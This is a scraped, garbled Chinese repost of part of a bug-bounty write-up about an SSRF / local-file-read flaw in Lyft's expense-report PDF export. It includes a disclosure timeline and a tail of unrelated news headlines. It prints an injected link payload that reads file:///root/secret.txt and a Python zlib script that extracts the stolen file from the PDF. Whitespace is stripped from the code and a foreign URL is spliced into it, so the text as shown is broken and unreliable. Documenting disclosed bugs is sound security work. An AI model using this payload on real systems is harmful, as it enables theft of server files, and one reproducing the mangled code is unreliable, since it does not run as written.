FreeBuf Lyft费用报告导出功能的SSRF漏洞分析( 二 ) 在外出参与某个安全会议的旅程中

<linkrel=attachmenthref=https://pcff.toutiao.jxnews.com.cn/p/20200625/”file:///root/secret.txt”>最终，利用数据压缩函数库zlib以及python,我们写了一个从PDF文件中解包本地文件的脚本，如下：
importsys,zlibdefmain(fn):data=https://pcff.toutiao.jxnews.com.cn/p/20200625/open(fn,'rb').readi=0first=Truelast=NonewhileTrue:i=data.find(b'>>nstreamn',i)ifi==-1:breaki+=10try:last=cdata=https://pcff.toutiao.jxnews.com.cn/p/20200625/zlib.decompress(data[i:])iffirst:first=Falseelse:pass#printcdataexcept:passprint(last.decode('utf-8'))if__name__=='__main__':main(*sys.argv[1:])最后一程在本地环境测试中，我们把上述脚本结合Lyft的PDF生成机制设置了一个包含Payload的行程记录，在导出PDF报告的过程中，触发了其中的SSRF利用，获取到了相应的用户信息，确认了漏洞的存在，如下：

文章图片
致谢感谢Lyft安全团队， Daeken的思路、@d0nutptr的漏洞验证，更多技术细节请查看HackerOne报告-H-885975 。
漏洞上报和处理过程2018.11.10-我初次发现漏洞
2018.11.29-在纽约比赛中与@Daeken合作完成POC
2018.11.29-报送Lyft安全团队
2018.11.29-Lyft修复漏洞
2018.11.30-Lyft告知漏洞已修复
2018.12.05-Lyft按其最高众测标准给予漏洞赏金
【FreeBuf Lyft费用报告导出功能的SSRF漏洞分析】2020.5.20-漏洞公开
*参考来源：nahamsec ， clouds编译整理，转载请注明来自FreeBuf.COM
精彩推荐

文章图片

FreeBuf Lyft费用报告导出功能的SSRF漏洞分析( 二 )

推荐阅读

大江网|4人中毒、3人死亡!景德镇一起24年前的投毒案破案了

怎么蒸河螃蟹不掉腿具体做法避免清蒸螃蟹掉腿的方法

多大岁数叫阿姨,一般大多少岁才叫阿姨-

生肖|10月开始，财源广进，财帛不缺，咸鱼翻身的4大生肖

怎样看待“高端人士”的类似言论？

1号车盟|天逸PHEV四驱版厦门上市，百公里油耗仅1.7L，23.47万起

教育部回应部分高校封闭管理|教育部回应部分高校封闭管理学生是按照“非必要不外出”原则

天津滨海新区法院|“知产小课堂”开讲啦，以学习促专业审判

红星新闻|昆明50余户业主住烂尾楼：做饭靠烧旧木板，晚归遭十多条野狗围攻

数评时代创造条件也要上：荣耀V40安排了，麒麟、天玑芯片全都用上

赵丽颖 |别嘲笑《琉璃》女主是丫鬟脸了，这种婢女头连赵丽颖热巴都难掌控

四个坏习惯最容易伤身，你中几个

教师节送什么礼物给老师最有意义-教师节送什么礼物好呢

云朵日本留学|为什么孩子可以独立上下学？，在日本

飞龙|安可玛汀被最高法终审认定侵权安德玛知识产权

[乐居财经]黄红云“封赏”金科2100名基层员工

奇葩笑坊|她莫名其妙送我一面镜子，幽默笑话：和女友分手了

手机游戏|王者荣耀体验服更新快讯：马超喜提削弱！玩家：新皮肤该咋办？

萌萌小少女|称呼变化还直播连线，恋情曝光？徐冬冬和张国伟公开互动不避嫌

豆角|想吃酸豆角不用买，教你这样做，腌制最美味的酸豆角！